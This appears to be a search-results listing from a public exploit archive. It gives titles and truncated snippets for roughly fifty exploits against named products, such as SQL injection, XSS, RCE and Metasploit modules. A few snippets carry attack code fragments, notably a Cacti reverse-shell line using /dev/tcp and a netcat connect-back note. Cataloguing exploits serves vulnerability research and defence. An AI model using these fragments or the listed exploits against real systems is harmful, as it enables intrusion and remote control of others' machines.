47904 matches found
Google Android 5.0 < 5.1.1 - 'Stagefright' .MP4 tx3g Integer Overflow (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule "Android Stagefright MP4 tx3g Integer Overflow", 'Description' = %q This module exploits a integer overflow vulnerability in the...
Quick N Easy FTP Service 3.2 - Unquoted Service Path
Exploit Title: Quick 'n Easy FTP Service 3.2 - Unquoted Service Path Discovery by: yunaranyancat Discovery Date: October 2020 Vendor Homepage: https://www.pablosoftwaresolutions.com/html/quickneasyftpservice.html Software Link : www.pablosoftwaresolutions.com/download.php?id=10 Tested Version: 3....
Gila CMS 1.11.8 - 'query' SQL Injection
Exploit Title: Gila CMS 1.11.8 - 'query' SQL Injection Date: 2020-06-15 Exploit Author: Carlos Ramírez L. BillyV4 Vendor Homepage: https://gilacms.com/ Software Link: https://github.com/GilaCMS/gila/releases/tag/1.11.8 Version: Gila 1.11.8 Tested on: Gila 1.11.8 CVE : CVE-2020-5515 import request...
CyberPanel 2.1 - Remote Code Execution (RCE) (Authenticated)
Title: CyberPanel 2.1 - Remote Code Execution RCE Authenticated Date: 27.08.2021 Author: Numan Türle Vendor Homepage: https://cyberpanel.net/ Software Link: https://github.com/usmannasir/cyberpanel Version: =2.1 https://www.youtube.com/watch?v=J8iLELVgkE !/usr/bin/python3 -- coding: utf-8 --...
Car Rental Management System 1.0 - 'car_id' Sql Injection
Exploit Title: Car Rental Management System 1.0 - 'carid' Sql Injection Date: 2020-11.13 Exploit Author: Mehmet Kelepçe / Gais Cyber Security Author ID: 8763 Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html Software Link:...
D-Link DSR-250N 3.12 - Denial of Service (PoC)
Exploit Title: D-Link DSR-250N 3.12 - Denial of Service PoC Google Dork: N/A Author: RedTeam Pentesting GmbH Date: 2020-10-03 Exploit Author: Kiko Andreu kikoas1995 & Daniel Monzón stark0de Vendor Homepage: https://www.dlink.com Software Link:...
Webmin 1.973 - 'save_user.cgi' Cross-Site Request Forgery (CSRF)
Exploit Title: Webmin 1.973 - 'saveuser.cgi' Cross-Site Request Forgery CSRF Date: 24/04/2021 Exploit Author: Mesh3l911 & Z0ldyck Vendor Homepage: https://www.webmin.com Repo Link: https://github.com/Mesh3l911/CVE-2021-31762 Version: Webmin 1.973 Tested on: All versions POC By \0331;m...
CHIYU IoT Devices - Denial of Service (DoS)
Exploit Title: CHIYU IoT Devices - Denial of Service DoS Date: 01/06/2021 Exploit Author: sirpedrotavares Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html Software Link: https://www.chiyu-tech.com/category-hardware.html Version: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC - all...
FortiLogger 4.4.2.2 - Unauthenticated Arbitrary File Upload (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'FortiLogger Arbitrary File Upload Exploit', 'Description' = %q This module exploits an unauthenticated arbitrary file upload via insecure POST...
Bludit 3.13.1 - 'username' Cross Site Scripting (XSS)
Exploit Title: Bludit 3.13.1 - 'username' Cross Site Scripting XSS Date: 19/10/2021 Exploit Author: Vasu tamilanmkv Vendor Homepage: https://www.bludit.com Software Link: https://www.bludit.com/releases/bludit-3-13-1.zip Version: bludit-3-13-1 Tested on: kali linux CVE : CVE-2021-35323 Steps to...
Adive Framework 2.0.8 - Persistent Cross-Site Scripting
Exploit Title: Adive Framework 2.0.8 - Persistent Cross-Site Scripting Exploit Author: Sarthak Saini Dork: N/A Date: 2020-01-18 Vendor Link : https://www.adive.es/ Software Link: https://github.com/ferdinandmartin/adive-php7 Version: 2.0.8 Category: Webapps Tested on: windows64bit / mozila firefo...
Apache 2.4.7 + PHP 7.0.2 - 'openssl_seal()' Uninitialized Memory Code Execution
?php // Source: http://akat1.pl/?id=1 function getmaps $fh = fopen"/proc/self/maps", "r"; $maps = fread$fh, 331337; fclose$fh; return explode"\n", $maps; function findmap$sym $addr = 0; foreachgetmaps as $record if strstr$record, $sym && strstr$record, "r-xp" $addr = hexdecexplode'-', $record0;...
COVID19 Testing Management System 1.0 - 'searchdata' SQL Injection
Exploit Title: COVID19 Testing Management System 1.0 - 'searchdata' SQL Injection Google Dork: intitle: "COVID19 Testing Management System" Date: 09/08/2021 Exploit Author: Ashish Upsham Vendor Homepage: https://phpgurukul.com Software Link:...
Gitlab 12.9.0 - Arbitrary File Read (Authenticated)
Exploit Title: Gitlab 12.9.0 - Arbitrary File Read Authenticated Google Dork: - Date: 11/15/2020 Exploit Author: Jasper Rasenberg Vendor Homepage: https://about.gitlab.com Software Link: https://about.gitlab.com/install Version: tested on gitlab version 12.9.0 Tested on: Kali Linux 2020.3 You can...
User Registration & Login and User Management System 2.1 - SQL Injection
Exploit Title: User Registration & Login and User Management System 2.1 - SQL Injection Dork: N/A Date: 2020-10-22 Exploit Author: Ihsan Sencan Vendor Homepage: https://phpgurukul.com Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/ Versio...
Mobile Shop System v1.0 - SQL Injection Authentication Bypass
Title: Mobile Shop System v1.0 - SQLi lead to authentication bypass Exploit Author: Moaaz Taha 0xStorm Date: 2020-09-08 Vendor Homepage: https://www.sourcecodester.com/php/14412/mobile-shop-system-php-mysql.html Software Link:...
College-Management-System-Php 1.0 - Authentication Bypass
Exploit Title: College-Management-System-Php 1.0 - Authentication Bypass / SQL Injection Exploit Author: BLAY ABU SAFIAN Inveteck Global Website: https://github.com/olotieno/College-Management-System-Php Date: 2020-06-16 Google Dork: N/A Vendor: https://github.com/olotieno/ Software Link:...
Firefox 72 IonMonkey - JIT Type Confusion
Exploit Title: Firefox 72 IonMonkey - JIT Type Confusion Date: 2021-05-10 Exploit Author: deadlock Forrest Orr Vendor Homepage: https://www.mozilla.org/en-US/ Software Link: https://www.mozilla.org/en-US/firefox/new/ Versions: Firefox | | /| \ | |\ / / \ | | / | | / / / / |/ | /|/ \ / / || /||...
Car Rental Management System 1.0 - 'id' SQL Injection (Authenticated)
Exploit Title: Car Rental Management System 1.0 - 'id' SQL Injection Authenticated Date: 2020-11-14 Exploit Author: Mehmet Kelepçe / Gais Cyber Security Author ID: 8763 Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html Software...
WebLogic Server - Deserialization RCE - BadAttributeValueExpException (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'WebLogic Server Deserialization RCE - BadAttributeValueExpException', 'Description' = %q There exists a Java object deserialization vulnerability...
TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass
Exploit Title: TP-Link TL-WA855RE V5200415 - Device Reset Auth Bypass Date: 2020/07/29 Exploit Author: malwrforensics Vendor Homepage: https://tp-link.com Software link: https://static.tp-link.com/2020/202004/20200430/TL-WA855REV5200415.zip Version: TL-WA855REUSV5200415 Tested on: N/A CVE :...
Virtual Airlines Manager 2.6.2 - 'airport' SQL Injection
Exploit Title: Virtual Airlines Manager 2.6.2 - 'airport' SQL Injection Google Dork: N/A Date: 2020-06-08 Exploit Author: Kostadin Tonev Vendor Homepage: http://virtualairlinesmanager.net Software Link: https://virtualairlinesmanager.net/index.php/vam-releases/ Version: 2.6.2 Tested on: Linux Min...
Samba 3.4.5 - Symlink Directory Traversal
source: https://www.securityfocus.com/bid/38111/info Samba is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input. Exploits would allow an attacker to access files outside of the Samba user's root directory to obtain sensitive...
SuiteCRM 7.11.18 - Remote Code Execution (RCE) (Authenticated) (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'SuiteCRM Log File Remote Code Execution', 'Description' = %q This module exploits an input validation error on the log file extension parameter. ...
Comersus Cart 7.0.7 - 'comersus_optReviewReadExec.asp?id' SQL Injection
source: https://www.securityfocus.com/bid/24562/info Comersus Cart is affected by multiple input validation vulnerabilities. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. The attacker may...
Cacti v1.2.22 - Remote Command Execution (RCE)
Exploit Title: Cacti v1.2.22 - Remote Command Execution RCE Exploit Author: Riadh BOUCHAHOUA Discovery Date: 2022-12-08 Vendor Homepage: https://www.cacti.net/ Software Links : https://github.com/Cacti/cacti Tested Version: 1.2.2x /dev/tcp/self.rshost/self.rsport &1'" import base64 b64revshell =...
SOYAL Biometric Access Control System 5.0 - 'Change Admin Password' CSRF
Exploit Title: SOYAL Biometric Access Control System 5.0 - 'Change Admin Password' CSRF Date: 25.01.2021 Exploit Author: LiquidWorm Vendor Homepage: https://www.soyal.com.tw https://www.soyal.com Vendor: SOYAL Technology Co., Ltd Product web page: https://www.soyal.com.tw | https://www.soyal.com...
Invision Community 4.5.4 - 'Field Name' Stored Cross-Site Scripting
Exploit Title: Invision Community 4.5.4 - 'Field Name' Stored Cross-Site Scripting Date: 02-12-2020 Exploit Author: Hemant Patidar HemantSolo Vendor Homepage: https://invisioncommunity.com/ Software Link: https://invisioncommunity.com/buy Version: 4.5.4 Tested on: Windows 10/Kali Linux CVE:...
Apache OpenMeetings 5.0.0 - 'hostname' Denial of Service
Exploit Title: Apache OpenMeetings 5.0.0 - 'hostname' Denial of Service Google Dork: "Apache OpenMeetings DOS" Date: 2020-08-28 Exploit Author: SunCSR ThienNV - Sun Cyber Security Research Vendor Homepage: https://openmeetings.apache.org/ Software Link: https://openmeetings.apache.org/ Version:...
mySCADA myPRO 7 - Hardcoded Credentials
Exploit Title: mySCADA myPRO v7 Hardcoded Credentials Date: 2018-07-02 Exploit Author: Emre ÖVÜNÇ Vendor Homepage: http://myscada.org Software Link: https://www.myscada.org/mypro/ Version: v7.0.45 Tested on: Windows/Linux CVE-2018-11311 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1131...
Mitrastar GPT-2541GNAC-N1 - Privilege escalation
Exploit Title: Mitrastar GPT-2541GNAC-N1 - Privilege escalation Date: 10-08-2021 Exploit Author: Leonardo Nicolas Servalli Vendor Homepage: www.mitrastar.com Platform: Mistrastar router devices GPT-2541GNAC-N1 HGU Tested on: Firmware BRg3.5100VNZ0b33 Vulnerability...
Jenkins 2.235.3 - 'Description' Stored XSS
Exploit Title: Jenkins 2.235.3 - 'Description' Stored XSS Date: 11/12/2020 Exploit Author: gx1 Vendor Homepage: https://www.jenkins.io/ Software Link: https://updates.jenkins-ci.org/download/war/ Version: = 2.251 and = LTS 2.235.3 Tested on: any CVE : CVE-2020-2230 References:...
OpenCart 3.0.3.6 - 'Profile Image' Stored Cross-Site Scripting (Authenticated)
Exploit Title: OpenCart 3.0.3.6 - 'Profile Image' Stored Cross Site Scripting Authenticated Date: 24-11-2020 Exploit Author: Hemant Patidar HemantSolo Vendor Homepage: https://www.opencart.com/ Software Link: https://www.opencart.com/index.php?route=cms/download Version: 3.0.3.6 Tested on: Window...
WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting (Authenticated)
Exploit Title: WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting Vulnerability Authenticated Date: 10.8.2020. Exploit Author: n1x MS-WEB Software Homepage: https://wordpress.org/plugins/wp-colorbox/ Software Link v1.1.1:...
MySQL / MariaDB / PerconaDB 5.5.51/5.6.32/5.7.14 - Code Execution / Privilege Escalation
!/usr/bin/python MySQL / MariaDB / Percona - Remote Root Code Execution / PrivEsc PoC Exploit CVE-2016-6662 0ldSQLMySQLRCEexploit.py ver. 1.0 For testing purposes only. Do no harm. Discovered/Coded by: Dawid Golunski http://legalhackers.com This is a limited version of the PoC exploit. It only...
Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Remote Code Execution
!/usr/bin/python Exploit Title: Pulse Secure Post-Auth Remote Code Execution Google Dork: inurl:/dana-na/ filetype:cgi Date: 09/05/2019 Exploit Author: Justin Wagner 0xDezzy, Alyssa Herrera @AlyssaHerrera Vendor Homepage: https://pulsesecure.net Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before...
TestBox CFML Test Framework 4.1.0 - Arbitrary File Write and Remote Code Execution
Title: TestBox CFML Test Framework 4.1.0 - Arbitrary File Write and Remote Code Execution Author: Darren King Date: 2020-07-23 Vendor Homepage: https://www.ortussolutions.com/products/testbox Software Link: https://www.ortussolutions.com/parent/download/testbox?version=3.1.0 Version : 2.4.0 throu...
Voting System 1.0 - Time based SQLI (Unauthenticated SQL injection)
Exploit Title: Voting System 1.0 - Time based SQLI Unauthenticated SQL injection Date: 02/05/2021 Exploit Author: Syed Sheeraz Ali Vendor Homepage: https://www.sourcecodester.com/php/12306/voting-system-using-php.html Software Link:...
iBall-Baton WRA150N Rom-0 Backup - File Disclosure (Sensitive Information)
Exploit Title: iBall-Baton WRA150N Rom-0 Backup - File Disclosure Sensitive Information Date: 07/01/2021 Exploit Author: h4cks1n Vendor Homepage: iball.co.in Version: iBall-Baton WRA150N Tested on : Windows 7/8/8.1/10, Parrot Linux OS The iBall-Baton router version WRA150N is vulnerable to the...
YATinyWinFTP - Denial of Service (PoC)
Exploit Title: YATinyWinFTP - Denial of Service PoC Google Dork: None Date: 20.08.2020 Exploit Author: strider Vendor Homepage: https://github.com/ik80/YATinyWinFTP Software Link: https://github.com/ik80/YATinyWinFTP Tested on: Windows 10...
TotalAV 2020 4.14.31 - Privilege Escalation
Exploit Title: TotalAV 2020 4.14.31 - Privilege Escalation Date: 2020-01-09 Exploit Author: Kusol Watchara-Apanukorn Vendor Homepage: https://www.totalav.com/ Version: 4.14.31 Fixed on: 5.3.35 Tested on: Windows 10 x64 CVE : CVE-2019-18194 Vulnerability Description: TotalAV 2020 4.14.31 has...
YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated)
Exploit Title: YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection Authenticated Date: 11-10-2021 Exploit Author: tahaafarooq Vendor Homepage: https://www.yealink.com/ Version: 53.84.0.15 Tested on: YeaLink IP Phone SIP-T19P Hadrware VOIP Phone Description: Using Diagnostic tool from the...
Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner
!/usr/bin/env python ap-unlock-v1337.py - apache + php 5. rem0te c0de execution exploit NOTE: - quick'n'dirty VERY UGLYY C=000DEEE IZ N0T MY STYLE : - for connect back shell start netcat/nc and bind port on given host:port - is ip-range scanner not is multithreaded, but iz multithreaded iz in...
EaseUS Data Recovery - 'ensserver.exe' Unquoted Service Path
Exploit Title: EaseUS Data Recovery - 'ensserver.exe' Unquoted Service Path Discovery by: bios Discovery Date: 2022-18-04 Vendor Homepage: https://www.easeus.com/ Tested Version: 15.1.0.0 Vulnerability Type: Unquoted Service Path Tested on OS: Microsoft Windows 10 Pro x64 Step to discover Unquote...
Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read
Exploit Title: Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read Date: October 16, 2021 Exploit Author: nam3lum Vendor Homepage: https://wordpress.org/plugins/duplicator/ Software Link: https://downloads.wordpress.org/plugin/duplicator.1.3.26.zip Version: 1.3.26 Tested on:...
Netgear R7000 Router - Remote Code Execution
EDB Note: Download https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/48588.zip Exploits a pre-authentication memcpy based stack buffer overflow vulnerability in httpd on several devices and versions: Device Version httpd md5sum Exploit status AC1450 V1.0.0.3610.0.17...
Sky File 2.1.0 iOS - Directory Traversal
Title: Sky File 2.1.0 iOS - Directory Traversal Author: Vulnerability Laboratory Date: 2020-04-21 Software Link: https://apps.apple.com/us/app/sky-file-wireless-transfer/id1236452210 CVE: N/A Document Title: =============== Sky File v2.1.0 iOS - Multiple Web Vulnerabilities References Source:...
Online Hotel Reservation System 1.0 - 'Multiple' Cross-site scripting (XSS)
Exploit Title: Online Hotel Reservation System 1.0 - 'Multiple' Cross-site scripting XSS Date: 2021-08-02 Exploit Author: Mohammad Koochaki Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html Software Link:...
Ruby 1.8.6/1.9 (WEBick HTTPd 1.3.1) - Directory Traversal
------------------------------------------------------------------------------------ Digital Security Research Group DSecRG Advisory DSECRG-08-018 Application: Ruby 1.8.6 WEBrick Web server Toolkit and applications that used WEBrick, like Metasploit 3.1 Versions Affected: 1.8.4 and all prior...
phpPgAdmin 7.13.0 - COPY FROM PROGRAM Command Execution (Authenticated)
Exploit Title: phpPgAdmin 7.13.0 - COPY FROM PROGRAM Command Execution Authenticated Date: 29/03/2021 Exploit Author: Valerio Severini Vendor Homepage: Software Link: https://github.com/phppgadmin/phppgadmin/releases/tag/REL7-13-0 Version: 7.13.0 or lower Tested on: Debian 10 and Ubuntu...